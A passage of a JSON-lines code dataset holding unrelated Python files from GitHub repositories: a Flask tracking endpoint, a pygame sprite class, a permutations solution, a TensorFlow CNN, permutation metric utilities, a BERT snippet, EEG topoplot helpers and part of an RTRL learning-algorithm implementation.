parser.parse_args(strict=True)\n\n\t\tt = cache.get('tracking:'+args['trackingId'])\n\t\tif t == None:\n\t\t\treturn jsonify(error='Tracking ID inactive'), 400\n\n\t\tinfo = pickle.loads(t)\n\t\tif info['tracking_pin'] != args['pin']:\n\t\t\treturn jsonify(error='Tracking ID inactive'), 
400\n\n\t\tinfo.pop('tracking_pin', None)\n\t\treturn jsonify(**info)\n\n\n\nif __name__ == '__main__':\n\tapp.run(debug=config['DEBUG']=='True', port=5001, host='0.0.0.0')\n","repo_name":"jcrumb/acro-backend","sub_path":"web-tracking/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29930298023","text":"\"\"\"\nFile containing the abstract definition of a sprite designed to be linked with a unit\n\"\"\"\n\nimport os\nfrom abc import ABCMeta, abstractmethod\nfrom copy import deepcopy\n\nimport pygame\nimport pygame.transform as transform\n\n__author__ = 'Anthony Rouneau'\n\n\nclass UnitSprite(pygame.sprite.Sprite, metaclass=ABCMeta):\n \"\"\"\n Abstract definition of a unit's sprite.\n \"\"\"\n\n def __init__(self, graphics: bool=True):\n \"\"\"\n Instantiates the sprite\n\n Args:\n graphics: True if this sprite must be drawn, False for testing and simulation purpose\n \"\"\"\n super().__init__()\n self.resFolder = os.path.join(\"res\", \"sprites\")\n img = None\n self.rect = None\n if graphics:\n location = os.path.join(os.curdir, self.imageRelativePath)\n img = pygame.image.load_extended(location) # type: pygame.Surface\n self.rect = img.get_rect() # type: pygame.Rect\n # img = img.convert_alpha()\n self.image = img\n\n def rotate(self, angle: float) -> None:\n \"\"\"\n Rotates this sprite\n\n Args:\n angle: The angle in degrees\n \"\"\"\n if self.image is not None and self.rect is not None:\n self.image = transform.rotate(self.image, angle)\n self.rect = self.image.get_rect() # type: pygame.Rect\n\n def size(self, width: int, height: int) -> None:\n \"\"\"\n Resize this sprite.\n\n Args:\n width: The new width\n height: The new height\n \"\"\"\n if self.image is not None and self.rect is not None:\n self.image = transform.scale(self.image, (width, height))\n (x, y) = self.rect.center\n self.rect = self.image.get_rect()\n self.rect.move_ip(x, y)\n\n @property\n @abstractmethod\n def imageRelativePath(self) -> str:\n \"\"\"\n Contains the relative path to the image of this sprite.\n \"\"\"\n pass\n\n def __deepcopy__(self, memo={}):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k != \"image\" and k != \"rect\":\n value = deepcopy(v, memo)\n else:\n value = None\n setattr(result, k, value)\n return result\n\n\n","repo_name":"Angeall/pyTGF","sub_path":"pytgf/characters/units/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72929334986","text":"from typing import List\nfrom sys import setrecursionlimit\nsetrecursionlimit(10 ** 9)\n\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n def dfs(perm):\n if len(perm) == len(nums):\n res.append(perm)\n return\n\n for num in nums:\n if num not in perm:\n dfs(perm + [num])\n\n res = []\n dfs([])\n\n return res\n\n\nprint(Solution().permute([1,2,3]))","repo_name":"boorooksus/Algorithm-Study","sub_path":"LeetCode/4회차/B34_Permutations2.py","file_name":"B34_Permutations2.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24750856180","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.contrib.layers as layers\nimport tensorflow.contrib.tpu as tpu\n\ndef 
model_fn(features, labels, mode, params):\n def get_input(features, labels):\n input_x = tf.expand_dims(features, axis=-1)\n input_y = tf.squeeze(labels)\n\n return input_x, input_y\n\n def conv_net(x):\n initializer = tf.random_normal_initializer(stddev=0.01)\n with tf.name_scope(\"conv1\"):\n filter = tf.get_variable(\"filter-%s\" % 64, [5, 5, 1, 64],\n initializer=initializer)\n\n x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.elu(x)\n x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n with tf.name_scope(\"conv2\"):\n # conv\n filter = tf.get_variable(\"filter-%s\" % 128, [5, 5, 64, 128],\n initializer=initializer)\n x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.elu(x)\n x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n# with tf.name_scope(\"conv3\"):\n# # conv\n# filter = tf.get_variable(\"filter-%s\" % 258, [5, 5, 128, 258],\n# initializer=initializer)\n# x = tf.nn.conv2d(x, filter=filter, strides=[1, 1, 1, 1], padding=\"SAME\")\n# x = tf.nn.elu(x)\n# x = tf.nn.max_pool(x, ksize=(1, 2, 2, 1), strides=[1, 2, 2, 1], padding='VALID')\n# if mode==tf.estimator.ModeKeys.TRAIN:\n# with tf.name_scope(\"drop_out\"):\n# x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n return x\n\n def fullconnected(x):\n\n with tf.name_scope(\"full_connect1\"):\n x = tf.layers.dense(x, units=params.hidden_size, activation=\"elu\")\n if mode==tf.estimator.ModeKeys.TRAIN:\n with tf.name_scope(\"drop_out\"):\n x = tf.nn.dropout(x, keep_prob=params.drop_out)\n\n with tf.name_scope(\"full_connect2\"):\n logist = tf.layers.dense(x, units=params.num_class)\n\n return logist\n\n x, y = get_input(features, labels)\n x = tf.contrib.layers.batch_norm(x)\n x = conv_net(x)\n x = layers.flatten(x)\n\n logits = fullconnected(x)\n prediction = tf.argmax(logits, axis=1)\n cross_entropy = tf.reduce_mean(tf.losses.sparse_softmax_cross_entropy(labels=y, logits=logits))\n train_op = layers.optimize_loss(loss=cross_entropy,\n global_step=tf.train.get_global_step(),\n learning_rate=params.learning_rate,\n optimizer=\"Adam\",\n clip_gradients=params.clip_max,\n )\n return tf.estimator.EstimatorSpec(mode=mode,\n predictions={\"logits\": logits, \"prediction\": prediction},\n loss=cross_entropy,\n train_op=train_op,\n eval_metric_ops={\"accuracy\": tf.metrics.accuracy(labels, prediction)})\n\n\n# import tensorflow.contrib.training as train\n# train.HParams\n\ndef create_estimator_and_spec():\n model_param = tf.contrib.training.HParams(\n num_class=10,\n hidden_size=256,\n clip_max=5.0,\n drop_out=0.7,\n learning_rate=0.01,\n batch_size=128\n )\n run_config = tf.estimator.RunConfig(\n model_dir=\"./\",\n save_checkpoints_secs=300,\n save_summary_steps=100)\n\n estimator = tf.estimator.Estimator(\n model_fn=model_fn,\n config=run_config,\n params=model_param\n )\n\n return estimator\n\n\nif __name__=='__main__':\n\n estimator = create_estimator_and_spec()\n\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.fashion_mnist.load_data()\n train_input_fn = tf.estimator.inputs.numpy_input_fn(x=x_train.astype(np.float32), y=y_train.astype(np.int32),\n shuffle=True, batch_size=128, num_epochs=10)\n test_input_fn = 
tf.estimator.inputs.numpy_input_fn(x=x_test.astype(np.float32), y=y_test.astype(np.int32),\n shuffle=False, batch_size=128, num_epochs=1)\n\n # estimator.train(input_fn=train_input_fn)\n train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn)\n evel_spec = tf.estimator.EvalSpec(input_fn=test_input_fn)\n # estimator.train(input_fn=train_input_fn)\n tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=evel_spec)\n","repo_name":"hjhgo/deep_learning_demo","sub_path":"fashion_minst.py","file_name":"fashion_minst.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21259876409","text":"\"\"\"\nRodney McCoy\nThu Oct 13 13:08:41 2022\\\nrbmj2001@outlook.com \n\"\"\"\n\n\n\nimport itertools # For Basic Permutation Operations\nimport copy\n\n\n\n#%% ----- Basic Permutation Methods, Conversion and Format Checking ----- \n\n\n\n# In: Signed Permutation in 1 line notation\n# Out: Permutation in cycle notation (as disjoint cycles, not necessarily\n# transpositions) also 1 cycles are left in\ndef to_cycle(pi : list) -> list:\n cycles = []\n # For each possible value of permutation\n for i in pi.keys():\n skip = False \n # Skip if i has already been placed in cycle\n if len(cycles) != 0:\n for x in cycles:\n if i in x:\n skip = True\n if(skip):\n continue\n # If i is not swapped, add it alone to cycles, \n # Else produce the cycle that swaps i and add it to cycles\n if(pi[i] == i):\n cycles.append([i])\n else:\n j = i\n c = []\n while(True):\n if j in c:\n break\n c.append(j)\n j = pi[j] \n cycles.append(c)\n return cycles\n\n\n\n# In: A Signed Permutation in 1 Line Notation\n# Out: The Permutation Decomposed into 2 Cycles\ndef to_2_cycle(pi : list) -> list:\n # Change 1 line to disjoint cycles\n cycles = to_cycle(pi)\n \n two_cycles = []\n # For each disjoint cycle\n for c in cycles:\n # If it is already a 2 cycle, add it\n # Else decompose into 2 cycles, and add each Its decomposed in the form\n # (a_1, ..., a_n) = (a_1 a_n) (a_1 a_{n-1}) ... (a_2 a_1)\n if (len(c) == 2):\n two_cycles.append(c)\n else:\n for i in range(len(c), 1, -1): \n # (possible bug) should i go to 1+1 rather than 1 since it zero indexes\n two_cycles.append([c[0], c[i-1]])\n return two_cycles\n\n\n\n# Out: True if input is in 1 line format, false else\ndef check_1_line(pi : dict):\n if (not isinstance(pi, dict) or max(pi.keys()) != max(pi.values()) or \n min(pi.keys()) != min(pi.values()) or max(pi.keys()) != -min(pi.keys())):\n raise Exception(\"Inputed permutation is not in 1 line\")\n if 0 in pi.keys() or 0 in pi.values():\n raise Exception(\"Inputed permutation is not in 1 line\")\n\n\n\n# Out: True if input in disjoint cycles format, false else\ndef check_cycles(pi : list) -> bool:\n if not isinstance(pi, list):\n raise Exception(\"Inputed permutation is not in cycle\")\n for j in pi:\n if not isinstance(j, list):\n raise Exception(\"Inputed permutation is not in cycle\")\n\n\n\n# Out: True if input in 2 cycles format, false else\ndef check_2_cycles(pi : list) -> bool:\n if not isinstance(pi, list):\n raise Exception(\"Inputed permutation is not in 2 cycle\")\n for j in pi:\n if not isinstance(j, list) or len(j) != 2:\n raise Exception(\"Inputed permutation is not in 2 cycle\")\n\n\n\n# In: A Signed Permutation Decomposed into 1 line notation, and 2 * dim. 
of the\n# hypercube\n# Out: True if Permutation is Isomorphic to a Hypercube, False else\ndef is_hyper_cube(pi : list) -> bool: \n # Ensure its actually a signed permutation \n check_1_line(pi)\n \n # Ensure permutation maps opposite faces to opposite faces\n for i in range (1, max(pi.values()) + 1):\n if pi[i] != - pi[-i]:\n return False\n return True\n\n\n\n\n\n\n\n\n\n#%% ----- Metrics and \"Recursive Characterization\" Test Conditions -----\n\n\n\n# In: A Signed Permutation in 1 line notation, a 1 indexed integer i\n# Out: The permutation a|_i, created by me\ndef a_bar(a : dict, dim : int, i : int) -> list:\n # do work\n # if dim \n \n return []\n raise Exception(\"Unable to calculate a_bar / a|_i with permutation\", a)\n\n\n\n# In: A Signed Permutation in 1 line notation, and integer representing S_n,\n# the permutation group we are in\n# Out: True if permutation satisfies recursive characterization for hypercubes, else false\ndef is_equal(pi : dict, dim : int) -> bool:\n if dim <= 2:\n return True\n return False\n\n\n \n# In: A Signed Permutation in 1 line notation\n# Out: Length of the permutation. Total Amount of hypercube inversions over \n# the Permutation\ndef I_n(pi : dict) -> int:\n count = 0\n \n for i in pi.keys():\n for j in range(i+1, max(pi.keys()) + 1):\n if j == 0:\n continue\n if pi[i] > pi[j]:\n count += 1 \n\n \n count = count/2\n \n for i in range(1, max(pi)+1):\n if(pi[i] < pi[-i]):\n count += 1/2 \n \n return int(count)\n \n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: The reflection length of the permutation. Or, n - all cycles of the \n# form (i j k ) (-i -j -k). NOTE: not necessarily length three, (i j)\n# (-i -j) also counts\ndef EX_n(pi : dict) -> int:\n c_pi = to_cycle(pi)\n \n val = 0\n for i in range(len(c_pi)):\n for j in range(i+1, len(c_pi)):\n if len(c_pi[i]) != len(c_pi[j]):\n continue\n is_valid = True\n for k in c_pi[i]:\n if not -k in c_pi[j]:\n is_valid = 0\n break\n if is_valid:\n val += 1\n \n return int(len(pi)/2) - val\n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: Depth of permutation, as shown in \"depth in classic coxeter groups\"\ndef D_n(pi : dict) -> int:\n val = 0\n n = max(pi.keys())\n \n \n # calculate everything except b oddness\n for i in range(1, n +1):\n if pi[i] > i:\n val += pi[i] - i\n if pi[i] < 0:\n val += abs(pi[i]) - 1/2\n \n # calculate b oddness\n decomposition = []\n temp_1 = [0]\n while max(temp_1) < n:\n i = max(temp_1)+1\n temp_1 = []\n \n '''\n while not i in temp_1:\n temp_1.append(i)\n i = abs(pi[i])\n '''\n \n not_finished = False\n while not_finished == False:\n while not i in temp_1:\n temp_1.append(i)\n i = abs(pi[i])\n temp_1.sort()\n not_finished = True\n for j in range(len(temp_1)-1):\n if temp_1[j+1] - temp_1[j] != 1:\n not_finished = False\n i = temp_1[j] + 1\n break\n \n \n \n decomposition.append( [i for i in range(min(temp_1), max(temp_1)+1)] )\n \n \n # count sections with odd negative entries\n for d in decomposition:\n count = 0\n for i in d:\n if pi[i] < 0:\n count += 1\n if count % 2 == 1:\n val += 1/2\n \n return val\n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: D_n - I_n - EX_n using hypercube metrics\ndef K_n(h : dict) -> int:\n return D_n(h) - (I_n(h) + EX_n(h))/2\n\n\n\n\n\n\n\n\n\n#%% ----- Main Function -----\n\n\nresults1 = []\n\n\ndef main():\n max_dimension = 5\n \n for n in range(1, max_dimension+1):\n r = []\n id_n = [i for i in range(-n, n+1)]\n id_n.remove(0)\n pi = {i : 0 for i in id_n}\n print(n)\n for pi_tuple in 
itertools.permutations(id_n):\n for unsigned_id, signed_id in enumerate(id_n):\n pi[signed_id] = pi_tuple[unsigned_id]\n if not is_hyper_cube(pi):\n continue\n if K_n(pi) != 0 or K_n(pi) == 0:\n r.append( ( [pi[i] for i in range (1, n+1)], \n D_n(pi), I_n(pi)/2, EX_n(pi)/2, K_n(pi), \n is_equal(pi, int(len(pi)/2)))\n )\n # copy.copy(pi),\n results1.append(n)\n results1.append(r)\n \n #pi ={-3:3, -2:2, -1:1, 1:-1, 2:-2, 3:-3}\n #print((pi, D_n(pi), I_n(pi), EX_n(pi), K_n(pi) ))\n\n\nif(__name__ == \"__main__\"):\n main() ","repo_name":"RodneyMcCoy/shallow-permutations","sub_path":"src/Old Code/Hypercube_Metric_Tests.py","file_name":"Hypercube_Metric_Tests.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71593156745","text":"from transformers import BertTokenizer, BertModel\n\n# def paraphraseText(text):\nmodel = BertModel.from_pretrained('bert-base-uncased')\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\ninput_text = \"The quick brown fox jumps over the lazy dog.\"\ninput_ids = tokenizer.encode(input_text, return_tensors=\"pt\")\noutputs = model.generate(input_ids)\noutput_text = tokenizer.decode(outputs[0], skip_special_tokens=True)\n\n# Print the paraphrased text\nprint(output_text)","repo_name":"TejasNichat/Major-Project","sub_path":"youtube-transcript-summarizer-api/paraphraser.py","file_name":"paraphraser.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74688022983","text":"import mne\nimport numpy as np\nimport FeaturesExtraction \nfrom mne.event import define_target_events\nfrom mne.channels import make_1020_channel_selections\nimport pandas as pd\nimport numpy as np\nfrom statistics import mean\nimport matplotlib.pyplot as plt\nimport CreateSamples\nfrom scipy import spatial\nimport scipy\nimport TopoPB \n\n\n'''author of all function found in this file (except if specified otherwise): Alina Weinberger'''\n\n\ndef avPowerband(file_name, nb_subjects, ext):\n\n #dictionnary to acces data files (1-8) corresponding to subject n*:\n #subjects={0:3, 1:5, 2:6, 3:7, 4:10, 5:11, 6:12, 7:15, 8:17}\n\n subjects= range(nb_subjects)\n files=[]\n #bands={0:'delta',1:'theta',2:'alpha',3:'sigma',4:'beta',5:'low gamma'}\n\n #create a list of file names as found in work directory --> change as needed \n if ext == '.txt':\n for i in subjects:\n files.append(file_name +str(i)+ '.txt')\n test = np.loadtxt(files[0]) # to have right size of ave / divider array \n elif ext == '.npy':\n for i in subjects:\n files.append(file_name + str(i) + '.npy')\n test = np.load(files[0]) # to have right size of ave / divider array \n\n #empty (NaN)\n powerBlist=[pd.DataFrame(columns=['delta','theta','alpha','sigma','beta','low gamma'], index=range(len(test))) for x in subjects]\n\n\n #filled with zeros\n ave=np.zeros((len(test),6))\n divider=np.zeros((len(test),6))\n\n\n\n for i in subjects:\n \n #raw=mne.io.read_raw_edf(files[i]) #importing raw data \n #events=mne.events_from_annotations(raw) #extracting events \n\n if ext == '.txt':\n data= np.loadtxt(files[i])\n elif ext == '.npy':\n data= np.load(files[i])\n\n for j in range(len(data)):\n \n data_row=data[j] #extract data for each channel\n \n PSD=FeaturesExtraction.computePSD(data_row,300) #compute power spectral denstity for each channel \n f=PSD[0] #assign frequency and power spectral density to 2 different vectors\n p=PSD[1]\n\n 
powerBrow=FeaturesExtraction.computePowerBands(f, p) #compute absolute power bands for each channel\n powerBlist[i].iloc[j]=powerBrow #core.frame.DataFrame containing absolute power bands for each channel\n \n \n for k in range(len(data)): #each channel\n for y in range(6): #each band\n if not np.isnan(powerBlist[i].iloc[k,y]): \n ave[k,y] += powerBlist[i].iloc[k,y] #sum dataframes element by element\n divider[k,y] += 1 \n\n ave/=divider #average power band per electrode for all subjects\n ave= np.delete(ave, [4,33,40,43,45], axis=0)\n\n #np.save('average_PB.npy',ave) #save file \n\n #ave=np.delete(ave, (118,120,126),axis=0) #delete electrode with too high values\n \n av_delta=ave[:,0] #extract average for each band\n av_theta=ave[:,1]\n av_alpha=ave[:,2]\n #av_sigma=ave[:,3]\n av_beta=ave[:,4]\n av_lowgamma=ave[:,5]\n\n #dictio={'delta':av_delta, 'theta':av_theta, 'alpha': av_alpha, 'beta':av_beta, 'lowgamma':av_lowgamma}\n\n return av_delta, av_theta, av_alpha, av_beta, av_lowgamma\n\n\ndef avPowerband_sub(data):\n\n\n #empty (NaN)\n powerBlist=pd.DataFrame(columns=['delta','theta','alpha','sigma','beta','low gamma'], index=range(len(data)))\n\n\n #filled with zeros\n ave=np.zeros((len(data),6))\n divider=np.zeros((len(data),6))\n\n\n for j in range(len(data)):\n \n data_row=data[j] #extract data for each channel\n \n PSD=FeaturesExtraction.computePSD(data_row,1180) #compute power spectral denstity for each channel \n f=PSD[0] #assign frequency and power spectral density to 2 different vectors\n p=PSD[1]\n\n powerBrow=FeaturesExtraction.computePowerBands(f, p) #compute absolute power bands for each channel\n powerBlist.iloc[j]=powerBrow #core.frame.DataFrame containing absolute power bands for each channel\n \n \n for k in range(len(data)): #each channel\n for y in range(6): #each band\n if not np.isnan(powerBlist.iloc[k,y]): \n ave[k,y] += powerBlist.iloc[k,y] #sum dataframes element by element\n divider[k,y] += 1 \n\n ave/=divider #average power band per electrode for all subjects\n ave= np.delete(ave, [4,33,40,43,45], axis=0)\n\n #np.save('average_PB.npy',ave) #save file \n\n #ave=np.delete(ave, (118,120,126),axis=0) #delete electrode with too high values\n \n av_delta=ave[:,0] #extract average for each band\n av_theta=ave[:,1]\n av_alpha=ave[:,2]\n #av_sigma=ave[:,3]\n av_beta=ave[:,4]\n av_lowgamma=ave[:,5]\n\n #dictio={'delta':av_delta, 'theta':av_theta, 'alpha': av_alpha, 'beta':av_beta, 'lowgamma':av_lowgamma}\n\n return av_delta, av_theta, av_alpha, av_beta, av_lowgamma\n\n\n\ndef interp_elect_pos(elect_file_small, elect_file_big):\n\n elect_small = np.load(elect_file_small + '.npy') #load reference electrode positions\n elect_big = np.load(elect_file_big + '.npy') #load electrode positions to interpolate \n\n interp_idx_big=[]\n interp_elect_big=[]\n\n spat_dist= spatial.distance.cdist(elect_small, elect_big) #caluclate spatial distance between all the coordinates \n\n for i in range(len(spat_dist)):\n spat_dist_list= spat_dist[i].tolist()\n interp_idx_big.append(spat_dist_list.index(min(spat_dist_list))) #get index of minimum distance = index of nearest electrode\n\n for i in range(len(interp_idx_big)):\n interp_elect_big.append(elect_big[interp_idx_big[i]]) #get coordinates of nearest electrodes\n\n return interp_elect_big\n\ndef interp_data(list_big, elect_big, elect_small, interp_elect):\n\n elect_big = np.load(elect_big + '.npy')\n elect_small= np.load(elect_small + '.npy')\n interp_elect_big= np.load(interp_elect + '.npy')\n\n list_interp_data_big=[]\n\n for i in 
range(len(list_big)):\n list_interp_data_big.append(scipy.interpolate.griddata(elect_big, list_big[i], interp_elect_big))\n\n return list_interp_data_big\n\ndef interp_data2(elect_big, elect_small, list_big):\n\n second_min=100\n idx_min=[]\n idx_2min=[]\n mean_elect=[]\n interp_elect_min=[]\n interp_elect_2min=[]\n list_interp_data_big=[]\n divider=2\n\n spat_dist= spatial.distance.cdist(elect_small, elect_big)\n\n for i in range(spat_dist.shape[0]):\n \n spat_dist_list= spat_dist[i].tolist()\n minim=min(spat_dist_list)\n idx_min.append(spat_dist_list.index(minim)) \n\n for y in range(len(spat_dist_list)):\n if (spat_dist_list[y] < second_min) and (spat_dist_list[y] > minim) :\n second_min = spat_dist_list[y]\n idx_2min.append(spat_dist_list.index(second_min))\n\n for i in range(len(idx_min)):\n interp_elect_min.append(elect_big[idx_min[i]])\n interp_elect_2min.append(elect_big[idx_2min[i]])\n\n for i in range(len(interp_elect_min)):\n mean_elect.append((interp_elect_min[i]+interp_elect_2min))\n mean_elect[i]=mean_elect[i]/divider\n\n for i in range(len(list_big)):\n list_interp_data_big.append(scipy.interpolate.griddata(elect_big, list_big[i], mean_elect))\n\n return list_interp_data_big\n \n\n# mindist = np.min(spatial.distance.cdist(elect_LA, elect_DA), axis=1) \n\n\ndef array_topoplot(toplot, ch_xy, cmap='coolwarm', showtitle=False, titles=None, savefig=False, figpath=None, vmin=-3, vmax=3):\n\n '''author: Yann Harel'''\n\n #create fig\n fig, ax = plt.subplots(len(toplot),1, figsize=(20,10))\n #create a topomap for each data array\n for i, data in enumerate(toplot):\n image,_ = mne.viz.plot_topomap(data=data, pos=ch_xy, cmap=cmap, vmin=vmin, vmax=vmax, axes=ax[i], show=False)\n #option for title\n if showtitle == True:\n ax[i].set_title(titles[i], fontdict={'fontsize': 20, 'fontweight': 'heavy'})\n #add a colorbar at the end of the line (weird trick from https://www.martinos.org/mne/stable/auto_tutorials/stats-sensor-space/plot_stats_spatio_temporal_cluster_sensors.html#sphx-glr-auto-tutorials-stats-sensor-space-plot-stats-spatio-temporal-cluster-sensors-py)\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n divider = make_axes_locatable(ax[0])\n ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)\n plt.colorbar(image, cax=ax_colorbar)\n ax_colorbar.tick_params(labelsize=8)\n #save plot if specified\n if savefig == True:\n plt.savefig(figpath, dpi=300)\n plt.show()\n return fig, ax\n\ndef plot_dec_accu(DA=[],sensors_pos=[],mask=False,DA_thr=None,save_file=None, vmin=-3, vmax=3):\n\n '''author : Tarek Lajnef'''\n\n if mask:\n mask_default = np.full((len(DA)), False, dtype=bool)\n mask = np.array(mask_default)\n mask[DA >= DA_thr] = True\n mask_params = dict(marker='*', markerfacecolor='w', markersize=18) # significant sensors appearence\n fig = plt.figure(figsize = (10,5))\n ax,_ = mne.viz.plot_topomap(DA,sensors_pos,\n cmap='coolwarm',\n show=False,\n vmin=vmin,vmax=vmax,\n contours=True,\n mask = mask,\n mask_params = mask_params,\n extrapolate='local')\n fig.colorbar(ax, shrink=0.25)\n if save_file:\n plt.savefig(save_file, dpi = 300)\n else:\n fig = plt.figure(figsize = (10,5))\n ax,_ = mne.viz.plot_topomap(DA, sensors_pos,cmap='coolwarm',show=False,\n vmin=vmin,vmax=vmax,contours=True)\n #fig.colorbar(ax, shrink=0.25)\n if save_file:\n plt.savefig(save_file, dpi = 300)\n return ax\n\n\ndef array_plot_deccaccu(DA, ch_xy, maskk=True, DA_thr=None, marker='*', markersize=10, cmap='coolwarm', showtitle=False, titles=None, savefig=False, figpath=None, vmin=-3, 
vmax=3):\n\n #create fig\n fig, ax = plt.subplots(len(DA),1, figsize=(20,10))\n #create a topomap for each data array\n if maskk: \n for i, data in enumerate(DA):\n mask_default = np.full((len(DA[i])), False, dtype=bool)\n mask = np.array(mask_default)\n for j in range(len(data)):\n if data[j]> DA_thr: \n mask[j] = True\n mask_params = dict(marker=marker, markerfacecolor='w', markersize=markersize) # significant sensors appearence\n image,_ = mne.viz.plot_topomap(data=data, pos=ch_xy, cmap=cmap, vmin=vmin, vmax=vmax, axes=ax[i], contours=True, mask=mask, mask_params=mask_params, show=False)\n #option for title\n if showtitle == True:\n ax[i].set_title(titles[i], fontdict={'fontsize': 20, 'fontweight': 'heavy'})\n\n #add a colorbar at the end of the line (weird trick from https://www.martinos.org/mne/stable/auto_tutorials/stats-sensor-space/plot_stats_spatio_temporal_cluster_sensors.html#sphx-glr-auto-tutorials-stats-sensor-space-plot-stats-spatio-temporal-cluster-sensors-py)\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n divider = make_axes_locatable(ax[0])\n ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)\n plt.colorbar(image, cax=ax_colorbar)\n ax_colorbar.tick_params(labelsize=8)\n\n #save plot if specified\n if savefig == True:\n plt.savefig(figpath, dpi=300)\n\n plt.show()\n return fig, ax\n\ndef mean_per_subject(liste1, liste2):\n\n summ=0\n summ2=0\n list_sum=[]\n list_sum2=[]\n list_list_sum=[]\n list_list_sum2=[]\n diff=[]\n\n divider = liste1[0].shape[0]\n\n for i in range(len(liste1)): #nb_subjects\n array= liste1[0]\n for j in range(array.shape[1]): # nb electrodes\n samples=array[:,j]\n for k in range(samples.shape[0]): #nb samples\n summ+=samples[k]\n list_sum.append(summ) #list of sum of samples --> size nb electrodes \n list_list_sum.append(list_sum)\n list_sum=[]\n \n for i in range(len(list_list_sum)):\n for j in range(len(list_list_sum[i])):\n list_list_sum[i][j]/=divider #get mean for each electrode\n\n for i in range(len(liste2)): #nb_subjects\n array2= liste2[0]\n for j in range(array2.shape[1]): # nb electrodes\n samples2=array2[:,j]\n for k in range(samples2.shape[0]): #nb samples\n summ2+=samples2[k]\n list_sum2.append(summ2) #list of sum of samples --> size nb electrodes \n list_list_sum2.append(list_sum2)\n list_sum2=[]\n \n for i in range(len(list_list_sum2)):\n for j in range(len(list_list_sum2[i])):\n list_list_sum2[i][j]/=divider #get mean for each electrode\n\n for i in range(len(list_list_sum)):\n for j in range(len(list_list_sum[i])):\n diff.append((list_list_sum[i][j] - list_list_sum2[i][j])) #difference between 2 conditions \n\n return diff\n\n\n\n\n\n\n\n\n\n","repo_name":"ALINA991/Spectral-density-EEG-analysis","sub_path":"TopoPB.py","file_name":"TopoPB.py","file_ext":"py","file_size_in_byte":13221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"43256353588","text":"from learning_algorithms.Learning_Algorithm import Learning_Algorithm\nimport numpy as np\n\nclass RTRL(Learning_Algorithm):\n \"\"\"Implements the Real-Time Recurrent Learning (RTRL) algorithm from\n Williams and Zipser 1989.\n\n RTRL maintains a long-term \"influence matrix\" dadw that represents the\n derivative of the hidden state with respect to a flattened vector of\n recurrent update parameters. We concatenate [W_rec, W_in, b_rec] along\n the column axis and order the flattened vector of parameters by stacking\n the columns end-to-end. 
In other words, w_k = W_{ij} when i = k%n_h and\n j = k//n_h. The influence matrix updates according to the equation\n\n M' = JM + M_immediate (1)\n\n where J is the network Jacobian and M_immediate is the immediate influence\n of a parameter w on the hidden state a. (See paper for more detailed\n notation.) M_immediate is notated as papw in the code for \"partial a partial\n w.\" For a vanilla network, this can be simply (if inefficiently) computed as\n the Kronecker product of a_hat = [a_prev, x, 1] (a concatenation of the prev\n hidden state, the input, and a constant 1 (for bias)) with the activation\n derivatives organized in a diagonal matrix. The implementation of Eq. (1)\n is in the update_learning_vars method.\n\n Finally, the algorithm returns recurrent gradients by projecting the\n feedback vector q onto the influence matrix M:\n\n dL/dw = dL/da da/dw = qM (2)\n\n Eq. (2) is implemented in the get_rec_grads method.\"\"\"\n\n def __init__(self, rnn, M_decay=1, **kwargs):\n \"\"\"Inits an RTRL instance by setting the initial dadw matrix to zero.\"\"\"\n\n self.name = 'RTRL' #Algorithm name\n allowed_kwargs_ = set() #No special kwargs for RTRL\n super().__init__(rnn, allowed_kwargs_, **kwargs)\n\n #Initialize influence matrix\n self.dadw = np.zeros((self.n_h, self.rnn.n_h_params))\n self.M_decay = M_decay\n\n def update_learning_vars(self):\n \"\"\"Updates the influence matrix via Eq. (1).\"\"\"\n\n #Get relevant values and derivatives from network.\n self.a_hat = np.concatenate([self.rnn.a_prev,\n self.rnn.x,\n np.array([1])])\n D = self.rnn.alpha * np.diag(self.rnn.activation.f_prime(self.rnn.h))\n self.papw = np.kron(self.a_hat, D) #Calculate M_immediate\n self.rnn.get_a_jacobian() #Get updated network Jacobian\n\n #Update influence matrix via Eq. (1).\n self.dadw = self.M_decay * 